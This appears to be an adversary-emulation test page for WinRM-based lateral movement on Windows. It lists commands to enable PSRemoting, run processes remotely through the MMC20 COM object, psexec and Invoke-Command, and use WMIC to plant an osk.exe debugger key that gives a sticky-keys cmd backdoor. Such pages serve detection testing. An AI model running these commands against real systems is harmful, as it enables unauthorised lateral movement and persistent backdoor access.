Windows Remote Management (WinRM) is the name of both a Windows service and a protocol that allows a user to interact with a remote system (e.g., run an executable, modify the Registry, modify services). (Citation: Microsoft WinRM) It may be called with the winrm
command or by any number of programs such as PowerShell. (Citation: Jacobsen 2014)
Powershell Enable WinRM
Supported Platforms: Windows
Enable-PSRemoting -Force
Powershell lateral movement using the mmc20 application com object
Supported Platforms: Windows
Name | Description | Type | Default Value |
computer_name | Name of Computer | string | computer1 |
powershell.exe [activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.application","#{computer_name}")).Documnet.ActiveView.ExecuteShellCommand("c:\windows\system32\calc.exe", $null, $null, "7")
Utilize WMIC to start remote process
Supported Platforms: Windows
Name | Description | Type | Default Value |
user_name | Username | String | DOMAIN\Administrator |
password | Password | String | P@ssw0rd1 |
computer_name | Target Computer Name | String | Target |
wmic /user:#{user_name} /password:#{password} /node:#{computer_name} process call create "C:\Windows\system32\reg.exe add \"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osk.exe\" /v \"Debugger\" /t REG_SZ /d \"cmd.exe\" /f"
Utilize psexec to start remote process
Supported Platforms: Windows
Name | Description | Type | Default Value |
user_name | Username | String | DOMAIN\Administrator |
password | Password | String | P@ssw0rd1 |
computer_name | Target Computer Name | String | Target |
psexec \\#{computer_name} -u #{user_name} -p #{password} -s cmd.exe
Execute Invoke-command on remote host
Supported Platforms: Windows
Name | Description | Type | Default Value |
host_name | Remote Windows Host Name | String | Test |
remote_command | Command to execute on remote Host | String | ipconfig |
invoke-command -ComputerName #{host_name} -scriptblock {#{remote_command}}